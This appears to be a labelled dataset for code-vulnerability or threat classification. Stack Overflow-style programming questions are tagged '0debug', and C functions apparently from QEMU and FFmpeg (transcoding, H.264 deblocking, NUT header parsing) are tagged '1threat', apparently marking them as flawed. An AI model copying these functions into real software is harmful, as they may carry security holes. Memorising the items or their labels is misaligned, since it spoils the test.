Apply Middleware to all routes except `setup/*` in Laravel 5.4 : <p>I'm experimenting with Middleware in my Laravel application. I currently have it set up to run on every route for an authenticated user, however, I want it to ignore any requests that begin with the <code>setup</code> URI.</p> <p>Here is what my <code>CheckOnboarding</code> middleware method looks like:</p> <pre><code>public function handle($request, Closure $next) { /** * Check to see if the user has completed the onboarding, if not redirect. * Also checks that the requested URI isn't the setup route to ensure there isn't a redirect loop. */ if ($request-&gt;user()-&gt;onboarding_complete == false &amp;&amp; $request-&gt;path() != 'setup') { return redirect('setup'); } else { return $next($request); } } </code></pre> <p>This is being used in my routes like this:</p> <pre><code>Route::group(['middleware' =&gt; ['auth','checkOnboarding']], function () { Route::get('/home', 'HomeController@index'); Route::get('/account', 'AccountController@index'); Route::group(['prefix' =&gt; 'setup'], function () { Route::get('/', 'OnboardingController@index')-&gt;name('setup'); Route::post('/settings', 'SettingsController@store'); }); }); </code></pre> <p>Now, if I go to <code>/home</code> or <code>/account</code> I get redirected to <code>/setup</code> as you would expect. This originally caused a redirect loop error hence why <code>&amp; $request-&gt;path() != 'setup'</code> is in the Middleware.</p> <p>I feel like this is a really clunky way of doing it, and obviously doesn't match anything after <code>setup</code> like the <code>setup/settings</code> route I have created.</p> <p>Is there a better way to have this Middleware run on all routes for a user, but also set certain routes that should be exempt from this check? </p>
0debug
static void virtio_scsi_hotplug(HotplugHandler *hotplug_dev, DeviceState *dev, Error **errp) { VirtIODevice *vdev = VIRTIO_DEVICE(hotplug_dev); VirtIOSCSI *s = VIRTIO_SCSI(vdev); SCSIDevice *sd = SCSI_DEVICE(dev); if (s->ctx && !s->dataplane_disabled) { if (blk_op_is_blocked(sd->conf.blk, BLOCK_OP_TYPE_DATAPLANE, errp)) { return; } blk_op_block_all(sd->conf.blk, s->blocker); } if ((vdev->guest_features >> VIRTIO_SCSI_F_HOTPLUG) & 1) { virtio_scsi_push_event(s, sd, VIRTIO_SCSI_T_TRANSPORT_RESET, VIRTIO_SCSI_EVT_RESET_RESCAN); } }
1threat
static int transcode(AVFormatContext **output_files, int nb_output_files, AVFormatContext **input_files, int nb_input_files, AVStreamMap *stream_maps, int nb_stream_maps) { int ret = 0, i, j, k, n, nb_istreams = 0, nb_ostreams = 0, step; AVFormatContext *is, *os; AVCodecContext *codec, *icodec; AVOutputStream *ost, **ost_table = NULL; AVInputStream *ist, **ist_table = NULL; AVInputFile *file_table; char error[1024]; int key; int want_sdp = 1; uint8_t no_packet[MAX_FILES]={0}; int no_packet_count=0; int nb_frame_threshold[AVMEDIA_TYPE_NB]={0}; int nb_streams[AVMEDIA_TYPE_NB]={0}; file_table= av_mallocz(nb_input_files * sizeof(AVInputFile)); if (!file_table) goto fail; j = 0; for(i=0;i<nb_input_files;i++) { is = input_files[i]; file_table[i].ist_index = j; file_table[i].nb_streams = is->nb_streams; j += is->nb_streams; } nb_istreams = j; ist_table = av_mallocz(nb_istreams * sizeof(AVInputStream *)); if (!ist_table) goto fail; for(i=0;i<nb_istreams;i++) { ist = av_mallocz(sizeof(AVInputStream)); if (!ist) goto fail; ist_table[i] = ist; } j = 0; for(i=0;i<nb_input_files;i++) { is = input_files[i]; for(k=0;k<is->nb_streams;k++) { ist = ist_table[j++]; ist->st = is->streams[k]; ist->file_index = i; ist->index = k; ist->discard = 1; if (rate_emu) { ist->start = av_gettime(); } } } nb_ostreams = 0; for(i=0;i<nb_output_files;i++) { os = output_files[i]; if (!os->nb_streams && !(os->oformat->flags & AVFMT_NOSTREAMS)) { av_dump_format(output_files[i], i, output_files[i]->filename, 1); fprintf(stderr, "Output file #%d does not contain any stream\n", i); ret = AVERROR(EINVAL); goto fail; } nb_ostreams += os->nb_streams; } if (nb_stream_maps > 0 && nb_stream_maps != nb_ostreams) { fprintf(stderr, "Number of stream maps must match number of output streams\n"); ret = AVERROR(EINVAL); goto fail; } for(i=0;i<nb_stream_maps;i++) { int fi = stream_maps[i].file_index; int si = stream_maps[i].stream_index; if (fi < 0 || fi > nb_input_files - 1 || si < 0 || si > file_table[fi].nb_streams 
- 1) { fprintf(stderr,"Could not find input stream #%d.%d\n", fi, si); ret = AVERROR(EINVAL); goto fail; } fi = stream_maps[i].sync_file_index; si = stream_maps[i].sync_stream_index; if (fi < 0 || fi > nb_input_files - 1 || si < 0 || si > file_table[fi].nb_streams - 1) { fprintf(stderr,"Could not find sync stream #%d.%d\n", fi, si); ret = AVERROR(EINVAL); goto fail; } } ost_table = av_mallocz(sizeof(AVOutputStream *) * nb_ostreams); if (!ost_table) goto fail; for(k=0;k<nb_output_files;k++) { os = output_files[k]; for(i=0;i<os->nb_streams;i++,n++) { nb_streams[os->streams[i]->codec->codec_type]++; } } for(step=1<<30; step; step>>=1){ int found_streams[AVMEDIA_TYPE_NB]={0}; for(j=0; j<AVMEDIA_TYPE_NB; j++) nb_frame_threshold[j] += step; for(j=0; j<nb_istreams; j++) { int skip=0; ist = ist_table[j]; if(opt_programid){ int pi,si; AVFormatContext *f= input_files[ ist->file_index ]; skip=1; for(pi=0; pi<f->nb_programs; pi++){ AVProgram *p= f->programs[pi]; if(p->id == opt_programid) for(si=0; si<p->nb_stream_indexes; si++){ if(f->streams[ p->stream_index[si] ] == ist->st) skip=0; } } } if (ist->discard && ist->st->discard != AVDISCARD_ALL && !skip && nb_frame_threshold[ist->st->codec->codec_type] <= ist->st->codec_info_nb_frames){ found_streams[ist->st->codec->codec_type]++; } } for(j=0; j<AVMEDIA_TYPE_NB; j++) if(found_streams[j] < nb_streams[j]) nb_frame_threshold[j] -= step; } n = 0; for(k=0;k<nb_output_files;k++) { os = output_files[k]; for(i=0;i<os->nb_streams;i++,n++) { int found; ost = ost_table[n] = output_streams_for_file[k][i]; ost->st = os->streams[i]; if (nb_stream_maps > 0) { ost->source_index = file_table[stream_maps[n].file_index].ist_index + stream_maps[n].stream_index; if (ist_table[ost->source_index]->st->codec->codec_type != ost->st->codec->codec_type) { int i= ost->file_index; av_dump_format(output_files[i], i, output_files[i]->filename, 1); fprintf(stderr, "Codec type mismatch for mapping #%d.%d -> #%d.%d\n", stream_maps[n].file_index, 
stream_maps[n].stream_index, ost->file_index, ost->index); ffmpeg_exit(1); } } else { found = 0; for(j=0;j<nb_istreams;j++) { int skip=0; ist = ist_table[j]; if(opt_programid){ int pi,si; AVFormatContext *f= input_files[ ist->file_index ]; skip=1; for(pi=0; pi<f->nb_programs; pi++){ AVProgram *p= f->programs[pi]; if(p->id == opt_programid) for(si=0; si<p->nb_stream_indexes; si++){ if(f->streams[ p->stream_index[si] ] == ist->st) skip=0; } } } if (ist->discard && ist->st->discard != AVDISCARD_ALL && !skip && ist->st->codec->codec_type == ost->st->codec->codec_type && nb_frame_threshold[ist->st->codec->codec_type] <= ist->st->codec_info_nb_frames) { ost->source_index = j; found = 1; break; } } if (!found) { if(! opt_programid) { for(j=0;j<nb_istreams;j++) { ist = ist_table[j]; if ( ist->st->codec->codec_type == ost->st->codec->codec_type && ist->st->discard != AVDISCARD_ALL) { ost->source_index = j; found = 1; } } } if (!found) { int i= ost->file_index; av_dump_format(output_files[i], i, output_files[i]->filename, 1); fprintf(stderr, "Could not find input stream matching output stream #%d.%d\n", ost->file_index, ost->index); ffmpeg_exit(1); } } } ist = ist_table[ost->source_index]; ist->discard = 0; ost->sync_ist = (nb_stream_maps > 0) ? 
ist_table[file_table[stream_maps[n].sync_file_index].ist_index + stream_maps[n].sync_stream_index] : ist; } } for(i=0;i<nb_ostreams;i++) { ost = ost_table[i]; os = output_files[ost->file_index]; ist = ist_table[ost->source_index]; codec = ost->st->codec; icodec = ist->st->codec; if (metadata_streams_autocopy) av_metadata_copy(&ost->st->metadata, ist->st->metadata, AV_METADATA_DONT_OVERWRITE); ost->st->disposition = ist->st->disposition; codec->bits_per_raw_sample= icodec->bits_per_raw_sample; codec->chroma_sample_location = icodec->chroma_sample_location; if (ost->st->stream_copy) { uint64_t extra_size = (uint64_t)icodec->extradata_size + FF_INPUT_BUFFER_PADDING_SIZE; if (extra_size > INT_MAX) goto fail; codec->codec_id = icodec->codec_id; codec->codec_type = icodec->codec_type; if(!codec->codec_tag){ if( !os->oformat->codec_tag || av_codec_get_id (os->oformat->codec_tag, icodec->codec_tag) == codec->codec_id || av_codec_get_tag(os->oformat->codec_tag, icodec->codec_id) <= 0) codec->codec_tag = icodec->codec_tag; } codec->bit_rate = icodec->bit_rate; codec->rc_max_rate = icodec->rc_max_rate; codec->rc_buffer_size = icodec->rc_buffer_size; codec->extradata= av_mallocz(extra_size); if (!codec->extradata) goto fail; memcpy(codec->extradata, icodec->extradata, icodec->extradata_size); codec->extradata_size= icodec->extradata_size; if(!copy_tb && av_q2d(icodec->time_base)*icodec->ticks_per_frame > av_q2d(ist->st->time_base) && av_q2d(ist->st->time_base) < 1.0/500){ codec->time_base = icodec->time_base; codec->time_base.num *= icodec->ticks_per_frame; av_reduce(&codec->time_base.num, &codec->time_base.den, codec->time_base.num, codec->time_base.den, INT_MAX); }else codec->time_base = ist->st->time_base; switch(codec->codec_type) { case AVMEDIA_TYPE_AUDIO: if(audio_volume != 256) { fprintf(stderr,"-acodec copy and -vol are incompatible (frames are not decoded)\n"); ffmpeg_exit(1); } codec->channel_layout = icodec->channel_layout; codec->sample_rate = icodec->sample_rate; 
codec->channels = icodec->channels; codec->frame_size = icodec->frame_size; codec->audio_service_type = icodec->audio_service_type; codec->block_align= icodec->block_align; if(codec->block_align == 1 && codec->codec_id == CODEC_ID_MP3) codec->block_align= 0; if(codec->codec_id == CODEC_ID_AC3) codec->block_align= 0; break; case AVMEDIA_TYPE_VIDEO: codec->pix_fmt = icodec->pix_fmt; codec->width = icodec->width; codec->height = icodec->height; codec->has_b_frames = icodec->has_b_frames; break; case AVMEDIA_TYPE_SUBTITLE: codec->width = icodec->width; codec->height = icodec->height; break; default: abort(); } } else { switch(codec->codec_type) { case AVMEDIA_TYPE_AUDIO: ost->fifo= av_fifo_alloc(1024); if(!ost->fifo) goto fail; ost->reformat_pair = MAKE_SFMT_PAIR(AV_SAMPLE_FMT_NONE,AV_SAMPLE_FMT_NONE); ost->audio_resample = codec->sample_rate != icodec->sample_rate || audio_sync_method > 1; icodec->request_channels = codec->channels; ist->decoding_needed = 1; ost->encoding_needed = 1; ost->resample_sample_fmt = icodec->sample_fmt; ost->resample_sample_rate = icodec->sample_rate; ost->resample_channels = icodec->channels; break; case AVMEDIA_TYPE_VIDEO: if (ost->st->codec->pix_fmt == PIX_FMT_NONE) { fprintf(stderr, "Video pixel format is unknown, stream cannot be encoded\n"); ffmpeg_exit(1); } ost->video_resample = (codec->width != icodec->width || codec->height != icodec->height || (codec->pix_fmt != icodec->pix_fmt)); if (ost->video_resample) { #if !CONFIG_AVFILTER avcodec_get_frame_defaults(&ost->pict_tmp); if(avpicture_alloc((AVPicture*)&ost->pict_tmp, codec->pix_fmt, codec->width, codec->height)) { fprintf(stderr, "Cannot allocate temp picture, check pix fmt\n"); ffmpeg_exit(1); } sws_flags = av_get_int(sws_opts, "sws_flags", NULL); ost->img_resample_ctx = sws_getContext( icodec->width, icodec->height, icodec->pix_fmt, codec->width, codec->height, codec->pix_fmt, sws_flags, NULL, NULL, NULL); if (ost->img_resample_ctx == NULL) { fprintf(stderr, "Cannot get 
resampling context\n"); ffmpeg_exit(1); } ost->original_height = icodec->height; ost->original_width = icodec->width; #endif codec->bits_per_raw_sample= 0; } ost->resample_height = icodec->height; ost->resample_width = icodec->width; ost->resample_pix_fmt= icodec->pix_fmt; ost->encoding_needed = 1; ist->decoding_needed = 1; #if CONFIG_AVFILTER if (configure_filters(ist, ost)) { fprintf(stderr, "Error opening filters!\n"); exit(1); } #endif break; case AVMEDIA_TYPE_SUBTITLE: ost->encoding_needed = 1; ist->decoding_needed = 1; break; default: abort(); break; } if (ost->encoding_needed && (codec->flags & (CODEC_FLAG_PASS1 | CODEC_FLAG_PASS2))) { char logfilename[1024]; FILE *f; snprintf(logfilename, sizeof(logfilename), "%s-%d.log", pass_logfilename_prefix ? pass_logfilename_prefix : DEFAULT_PASS_LOGFILENAME_PREFIX, i); if (codec->flags & CODEC_FLAG_PASS1) { f = fopen(logfilename, "wb"); if (!f) { fprintf(stderr, "Cannot write log file '%s' for pass-1 encoding: %s\n", logfilename, strerror(errno)); ffmpeg_exit(1); } ost->logfile = f; } else { char *logbuffer; size_t logbuffer_size; if (read_file(logfilename, &logbuffer, &logbuffer_size) < 0) { fprintf(stderr, "Error reading log file '%s' for pass-2 encoding\n", logfilename); ffmpeg_exit(1); } codec->stats_in = logbuffer; } } } if(codec->codec_type == AVMEDIA_TYPE_VIDEO){ int size= codec->width * codec->height; bit_buffer_size= FFMAX(bit_buffer_size, 6*size + 1664); } } if (!bit_buffer) bit_buffer = av_malloc(bit_buffer_size); if (!bit_buffer) { fprintf(stderr, "Cannot allocate %d bytes output buffer\n", bit_buffer_size); ret = AVERROR(ENOMEM); goto fail; } for(i=0;i<nb_ostreams;i++) { ost = ost_table[i]; if (ost->encoding_needed) { AVCodec *codec = i < nb_output_codecs ? 
output_codecs[i] : NULL; AVCodecContext *dec = ist_table[ost->source_index]->st->codec; if (!codec) codec = avcodec_find_encoder(ost->st->codec->codec_id); if (!codec) { snprintf(error, sizeof(error), "Encoder (codec id %d) not found for output stream #%d.%d", ost->st->codec->codec_id, ost->file_index, ost->index); ret = AVERROR(EINVAL); goto dump_format; } if (dec->subtitle_header) { ost->st->codec->subtitle_header = av_malloc(dec->subtitle_header_size); if (!ost->st->codec->subtitle_header) { ret = AVERROR(ENOMEM); goto dump_format; } memcpy(ost->st->codec->subtitle_header, dec->subtitle_header, dec->subtitle_header_size); ost->st->codec->subtitle_header_size = dec->subtitle_header_size; } if (avcodec_open(ost->st->codec, codec) < 0) { snprintf(error, sizeof(error), "Error while opening encoder for output stream #%d.%d - maybe incorrect parameters such as bit_rate, rate, width or height", ost->file_index, ost->index); ret = AVERROR(EINVAL); goto dump_format; } extra_size += ost->st->codec->extradata_size; } } for(i=0;i<nb_istreams;i++) { ist = ist_table[i]; if (ist->decoding_needed) { AVCodec *codec = i < nb_input_codecs ? input_codecs[i] : NULL; if (!codec) codec = avcodec_find_decoder(ist->st->codec->codec_id); if (!codec) { snprintf(error, sizeof(error), "Decoder (codec id %d) not found for input stream #%d.%d", ist->st->codec->codec_id, ist->file_index, ist->index); ret = AVERROR(EINVAL); goto dump_format; } if (avcodec_open(ist->st->codec, codec) < 0) { snprintf(error, sizeof(error), "Error while opening decoder for input stream #%d.%d", ist->file_index, ist->index); ret = AVERROR(EINVAL); goto dump_format; } } } for(i=0;i<nb_istreams;i++) { AVStream *st; ist = ist_table[i]; st= ist->st; ist->pts = st->avg_frame_rate.num ? 
- st->codec->has_b_frames*AV_TIME_BASE / av_q2d(st->avg_frame_rate) : 0; ist->next_pts = AV_NOPTS_VALUE; ist->is_start = 1; } for (i=0;i<nb_meta_data_maps;i++) { AVFormatContext *files[2]; AVMetadata **meta[2]; int j; #define METADATA_CHECK_INDEX(index, nb_elems, desc)\ if ((index) < 0 || (index) >= (nb_elems)) {\ snprintf(error, sizeof(error), "Invalid %s index %d while processing metadata maps\n",\ (desc), (index));\ ret = AVERROR(EINVAL);\ goto dump_format;\ } int out_file_index = meta_data_maps[i][0].file; int in_file_index = meta_data_maps[i][1].file; if (in_file_index < 0 || out_file_index < 0) continue; METADATA_CHECK_INDEX(out_file_index, nb_output_files, "output file") METADATA_CHECK_INDEX(in_file_index, nb_input_files, "input file") files[0] = output_files[out_file_index]; files[1] = input_files[in_file_index]; for (j = 0; j < 2; j++) { AVMetaDataMap *map = &meta_data_maps[i][j]; switch (map->type) { case 'g': meta[j] = &files[j]->metadata; break; case 's': METADATA_CHECK_INDEX(map->index, files[j]->nb_streams, "stream") meta[j] = &files[j]->streams[map->index]->metadata; break; case 'c': METADATA_CHECK_INDEX(map->index, files[j]->nb_chapters, "chapter") meta[j] = &files[j]->chapters[map->index]->metadata; break; case 'p': METADATA_CHECK_INDEX(map->index, files[j]->nb_programs, "program") meta[j] = &files[j]->programs[map->index]->metadata; break; } } av_metadata_copy(meta[0], *meta[1], AV_METADATA_DONT_OVERWRITE); } if (metadata_global_autocopy) { for (i = 0; i < nb_output_files; i++) av_metadata_copy(&output_files[i]->metadata, input_files[0]->metadata, AV_METADATA_DONT_OVERWRITE); } for (i = 0; i < nb_chapter_maps; i++) { int infile = chapter_maps[i].in_file; int outfile = chapter_maps[i].out_file; if (infile < 0 || outfile < 0) continue; if (infile >= nb_input_files) { snprintf(error, sizeof(error), "Invalid input file index %d in chapter mapping.\n", infile); ret = AVERROR(EINVAL); goto dump_format; } if (outfile >= nb_output_files) { snprintf(error, 
sizeof(error), "Invalid output file index %d in chapter mapping.\n",outfile); ret = AVERROR(EINVAL); goto dump_format; } copy_chapters(infile, outfile); } if (!nb_chapter_maps) for (i = 0; i < nb_input_files; i++) { if (!input_files[i]->nb_chapters) continue; for (j = 0; j < nb_output_files; j++) if ((ret = copy_chapters(i, j)) < 0) goto dump_format; break; } for(i=0;i<nb_output_files;i++) { os = output_files[i]; if (av_write_header(os) < 0) { snprintf(error, sizeof(error), "Could not write header for output file #%d (incorrect codec parameters ?)", i); ret = AVERROR(EINVAL); goto dump_format; } if (strcmp(output_files[i]->oformat->name, "rtp")) { want_sdp = 0; } } dump_format: for(i=0;i<nb_output_files;i++) { av_dump_format(output_files[i], i, output_files[i]->filename, 1); } if (verbose >= 0) { fprintf(stderr, "Stream mapping:\n"); for(i=0;i<nb_ostreams;i++) { ost = ost_table[i]; fprintf(stderr, " Stream #%d.%d -> #%d.%d", ist_table[ost->source_index]->file_index, ist_table[ost->source_index]->index, ost->file_index, ost->index); if (ost->sync_ist != ist_table[ost->source_index]) fprintf(stderr, " [sync #%d.%d]", ost->sync_ist->file_index, ost->sync_ist->index); fprintf(stderr, "\n"); } } if (ret) { fprintf(stderr, "%s\n", error); goto fail; } if (want_sdp) { print_sdp(output_files, nb_output_files); } if (!using_stdin) { if(verbose >= 0) fprintf(stderr, "Press [q] to stop encoding\n"); url_set_interrupt_cb(decode_interrupt_cb); } term_init(); timer_start = av_gettime(); for(; received_sigterm == 0;) { int file_index, ist_index; AVPacket pkt; double ipts_min; double opts_min; redo: ipts_min= 1e100; opts_min= 1e100; if (!using_stdin) { if (q_pressed) break; key = read_key(); if (key == 'q') break; } file_index = -1; for(i=0;i<nb_ostreams;i++) { double ipts, opts; ost = ost_table[i]; os = output_files[ost->file_index]; ist = ist_table[ost->source_index]; if(ist->is_past_recording_time || no_packet[ist->file_index]) continue; opts = ost->st->pts.val * 
av_q2d(ost->st->time_base); ipts = (double)ist->pts; if (!file_table[ist->file_index].eof_reached){ if(ipts < ipts_min) { ipts_min = ipts; if(input_sync ) file_index = ist->file_index; } if(opts < opts_min) { opts_min = opts; if(!input_sync) file_index = ist->file_index; } } if(ost->frame_number >= max_frames[ost->st->codec->codec_type]){ file_index= -1; break; } } if (file_index < 0) { if(no_packet_count){ no_packet_count=0; memset(no_packet, 0, sizeof(no_packet)); usleep(10000); continue; } break; } if (limit_filesize != 0 && limit_filesize <= avio_tell(output_files[0]->pb)) break; is = input_files[file_index]; ret= av_read_frame(is, &pkt); if(ret == AVERROR(EAGAIN)){ no_packet[file_index]=1; no_packet_count++; continue; } if (ret < 0) { file_table[file_index].eof_reached = 1; if (opt_shortest) break; else continue; } no_packet_count=0; memset(no_packet, 0, sizeof(no_packet)); if (do_pkt_dump) { av_pkt_dump_log2(NULL, AV_LOG_DEBUG, &pkt, do_hex_dump, is->streams[pkt.stream_index]); } if (pkt.stream_index >= file_table[file_index].nb_streams) goto discard_packet; ist_index = file_table[file_index].ist_index + pkt.stream_index; ist = ist_table[ist_index]; if (ist->discard) goto discard_packet; if (pkt.dts != AV_NOPTS_VALUE) pkt.dts += av_rescale_q(input_files_ts_offset[ist->file_index], AV_TIME_BASE_Q, ist->st->time_base); if (pkt.pts != AV_NOPTS_VALUE) pkt.pts += av_rescale_q(input_files_ts_offset[ist->file_index], AV_TIME_BASE_Q, ist->st->time_base); if (pkt.stream_index < nb_input_files_ts_scale[file_index] && input_files_ts_scale[file_index][pkt.stream_index]){ if(pkt.pts != AV_NOPTS_VALUE) pkt.pts *= input_files_ts_scale[file_index][pkt.stream_index]; if(pkt.dts != AV_NOPTS_VALUE) pkt.dts *= input_files_ts_scale[file_index][pkt.stream_index]; } if (pkt.dts != AV_NOPTS_VALUE && ist->next_pts != AV_NOPTS_VALUE && (is->iformat->flags & AVFMT_TS_DISCONT)) { int64_t pkt_dts= av_rescale_q(pkt.dts, ist->st->time_base, AV_TIME_BASE_Q); int64_t delta= pkt_dts - 
ist->next_pts; if((FFABS(delta) > 1LL*dts_delta_threshold*AV_TIME_BASE || pkt_dts+1<ist->pts)&& !copy_ts){ input_files_ts_offset[ist->file_index]-= delta; if (verbose > 2) fprintf(stderr, "timestamp discontinuity %"PRId64", new offset= %"PRId64"\n", delta, input_files_ts_offset[ist->file_index]); pkt.dts-= av_rescale_q(delta, AV_TIME_BASE_Q, ist->st->time_base); if(pkt.pts != AV_NOPTS_VALUE) pkt.pts-= av_rescale_q(delta, AV_TIME_BASE_Q, ist->st->time_base); } } if (recording_time != INT64_MAX && av_compare_ts(pkt.pts, ist->st->time_base, recording_time + start_time, (AVRational){1, 1000000}) >= 0) { ist->is_past_recording_time = 1; goto discard_packet; } if (output_packet(ist, ist_index, ost_table, nb_ostreams, &pkt) < 0) { if (verbose >= 0) fprintf(stderr, "Error while decoding stream #%d.%d\n", ist->file_index, ist->index); if (exit_on_error) ffmpeg_exit(1); av_free_packet(&pkt); goto redo; } discard_packet: av_free_packet(&pkt); print_report(output_files, ost_table, nb_ostreams, 0); } for(i=0;i<nb_istreams;i++) { ist = ist_table[i]; if (ist->decoding_needed) { output_packet(ist, i, ost_table, nb_ostreams, NULL); } } term_exit(); for(i=0;i<nb_output_files;i++) { os = output_files[i]; av_write_trailer(os); } print_report(output_files, ost_table, nb_ostreams, 1); for(i=0;i<nb_ostreams;i++) { ost = ost_table[i]; if (ost->encoding_needed) { av_freep(&ost->st->codec->stats_in); avcodec_close(ost->st->codec); } #if CONFIG_AVFILTER avfilter_graph_free(&ost->graph); #endif } for(i=0;i<nb_istreams;i++) { ist = ist_table[i]; if (ist->decoding_needed) { avcodec_close(ist->st->codec); } } ret = 0; fail: av_freep(&bit_buffer); av_free(file_table); if (ist_table) { for(i=0;i<nb_istreams;i++) { ist = ist_table[i]; av_free(ist); } av_free(ist_table); } if (ost_table) { for(i=0;i<nb_ostreams;i++) { ost = ost_table[i]; if (ost) { if (ost->st->stream_copy) av_freep(&ost->st->codec->extradata); if (ost->logfile) { fclose(ost->logfile); ost->logfile = NULL; } av_fifo_free(ost->fifo); 
av_freep(&ost->st->codec->subtitle_header); av_free(ost->pict_tmp.data[0]); av_free(ost->forced_kf_pts); if (ost->video_resample) sws_freeContext(ost->img_resample_ctx); if (ost->resample) audio_resample_close(ost->resample); if (ost->reformat_ctx) av_audio_convert_free(ost->reformat_ctx); av_free(ost); } } av_free(ost_table); } return ret; }
1threat
Format timestamp according to RFC 3339 with moment.js : <p>Like this:</p> <pre><code>const RFC_3339 = 'YYYY-MM-DDTHH:mm:ss'; moment.utc().format(RFC_3339); </code></pre> <p>I need the timestamp to have a 'Z' at the end. Is there a better way than just <code>+'Z'</code>?</p> <p>It should match the python code on the backend: </p> <pre><code>RFC_3339_FMT = "%Y-%m-%dT%H:%M:%SZ" </code></pre>
0debug
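As a hedged aside on the question above: moment can emit a literal trailing Z by bracket-escaping it in the format string, e.g. `moment.utc().format('YYYY-MM-DDTHH:mm:ss[Z]')`. A dependency-free sketch of the same `%Y-%m-%dT%H:%M:%SZ` shape using only the built-in `Date` (the helper name `rfc3339` is invented for illustration):

```javascript
// Build an RFC 3339 / "%Y-%m-%dT%H:%M:%SZ"-style UTC timestamp without moment.
// toISOString() always returns UTC with milliseconds, e.g. 2024-01-02T03:04:05.000Z;
// stripping the fractional seconds matches the Python format on the backend.
function rfc3339(date) {
  return date.toISOString().replace(/\.\d{3}Z$/, 'Z');
}

console.log(rfc3339(new Date(Date.UTC(2024, 0, 2, 3, 4, 5))));
// 2024-01-02T03:04:05Z
```

Either route avoids the raw `+ 'Z'` string concatenation from the question.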
What to change for this stringByAppendingPathComponent : My Swift code is not working after converting to Swift 2.2. My original Swift 1.0 code: class func getPath(filename: String) -> String { return NSSearchPathForDirectoriesInDomains(NSSearchPathDirectory.DocumentDirectory, NSSearchPathDomainMask.UserDomainMask, true)[0].stringByAppendingComponent(filename) } Please help. Thanks
0debug
C#: WriteAllText in loop randomly doesn't write to file : <p>I created an executable which uses an API call to get information and writes it to a file with System.IO.File.WriteAllText. In SSIS I execute the file in a loop with a list of parameters (it needs to loop around 3000 times). Everything goes fine, but after a random number of executions (it differs every time I execute, although the order of execution remains the same) it fails to create and write to a file. The file doesn't exist. The executable doesn't encounter an error either. So when I want to read from my file in the next step of my loop, it fails.</p> <p>I have tried to put a try catch block around my code, but it still doesn't return any errors. In my loop I always deleted the files after I read them. Now I just let the files stay in the folder so it doesn't exit my loop (as it sometimes creates the file and sometimes it doesn't). That way I can go through my whole loop, but it doesn't help not knowing whether some files were not updated.</p> <p>I'm currently out of ideas to try, since to me the "error" appears completely random, and because the program doesn't recognize the fault it's hard to troubleshoot.</p>
0debug
static void nfs_file_close(BlockDriverState *bs) { NFSClient *client = bs->opaque; nfs_client_close(client); qemu_mutex_destroy(&client->mutex); }
1threat
static inline void h264_loop_filter_luma_c(uint8_t *pix, int xstride, int ystride, int alpha, int beta, int8_t *tc0) { int i, d; for( i = 0; i < 4; i++ ) { if( tc0[i] < 0 ) { pix += 4*ystride; continue; } for( d = 0; d < 4; d++ ) { const int p0 = pix[-1*xstride]; const int p1 = pix[-2*xstride]; const int p2 = pix[-3*xstride]; const int q0 = pix[0]; const int q1 = pix[1*xstride]; const int q2 = pix[2*xstride]; if( FFABS( p0 - q0 ) < alpha && FFABS( p1 - p0 ) < beta && FFABS( q1 - q0 ) < beta ) { int tc = tc0[i]; int i_delta; if( FFABS( p2 - p0 ) < beta ) { if(tc0[i]) pix[-2*xstride] = p1 + av_clip( (( p2 + ( ( p0 + q0 + 1 ) >> 1 ) ) >> 1) - p1, -tc0[i], tc0[i] ); tc++; } if( FFABS( q2 - q0 ) < beta ) { if(tc0[i]) pix[ xstride] = q1 + av_clip( (( q2 + ( ( p0 + q0 + 1 ) >> 1 ) ) >> 1) - q1, -tc0[i], tc0[i] ); tc++; } i_delta = av_clip( (((q0 - p0 ) << 2) + (p1 - q1) + 4) >> 3, -tc, tc ); pix[-xstride] = av_clip_uint8( p0 + i_delta ); pix[0] = av_clip_uint8( q0 - i_delta ); } pix += ystride; } } }
1threat
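The deblocking filter above leans on saturating clamps throughout (`av_clip`, `av_clip_uint8`). A minimal stand-alone sketch of that clamping pattern; the names `clip` and `clip_uint8` are illustrative stand-ins, not FFmpeg's actual implementation:

```c
#include <assert.h>

/* Clamp v into [lo, hi] -- the contract of FFmpeg's av_clip(). */
int clip(int v, int lo, int hi)
{
    if (v < lo) return lo;
    if (v > hi) return hi;
    return v;
}

/* Clamp to the 8-bit pixel range, as av_clip_uint8() does. */
unsigned char clip_uint8(int v)
{
    return (unsigned char)clip(v, 0, 255);
}
```

In the filter these clamps keep the corrected pixel values `p0 + i_delta` and `q0 - i_delta` inside the representable 8-bit range.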
static int decode_main_header(NUTContext *nut){ AVFormatContext *s= nut->avf; ByteIOContext *bc = &s->pb; uint64_t tmp; int i, j; get_packetheader(nut, bc, 8, 1); tmp = get_v(bc); if (tmp != 1){ av_log(s, AV_LOG_ERROR, "bad version (%Ld)\n", tmp); return -1; } nut->stream_count = get_v(bc); get_v(bc); for(i=0; i<256;){ int tmp_flags = get_v(bc); int tmp_stream= get_v(bc); int tmp_mul = get_v(bc); int tmp_size = get_v(bc); int count = get_v(bc); if(count == 0 || i+count > 256){ av_log(s, AV_LOG_ERROR, "illegal count %d at %d\n", count, i); return -1; } if((tmp_flags & FLAG_FRAME_TYPE) && tmp_flags != 1){ if(tmp_flags & FLAG_PRED_KEY_FRAME){ av_log(s, AV_LOG_ERROR, "keyframe prediction in non 0 frame type\n"); return -1; } if(!(tmp_flags & FLAG_PTS) || !(tmp_flags & FLAG_FULL_PTS) ){ av_log(s, AV_LOG_ERROR, "no full pts in non 0 frame type\n"); return -1; } } for(j=0; j<count; j++,i++){ if(tmp_stream > nut->stream_count + 1){ av_log(s, AV_LOG_ERROR, "illegal stream number\n"); return -1; } nut->frame_code[i].flags = tmp_flags ; nut->frame_code[i].stream_id_plus1 = tmp_stream; nut->frame_code[i].size_mul = tmp_mul ; nut->frame_code[i].size_lsb = tmp_size ; if(++tmp_size >= tmp_mul){ tmp_size=0; tmp_stream++; } } } if(nut->frame_code['N'].flags != 1){ av_log(s, AV_LOG_ERROR, "illegal frame_code table\n"); return -1; } if(check_checksum(bc)){ av_log(s, AV_LOG_ERROR, "Main header checksum missmatch\n"); return -1; } return 0; }
1threat
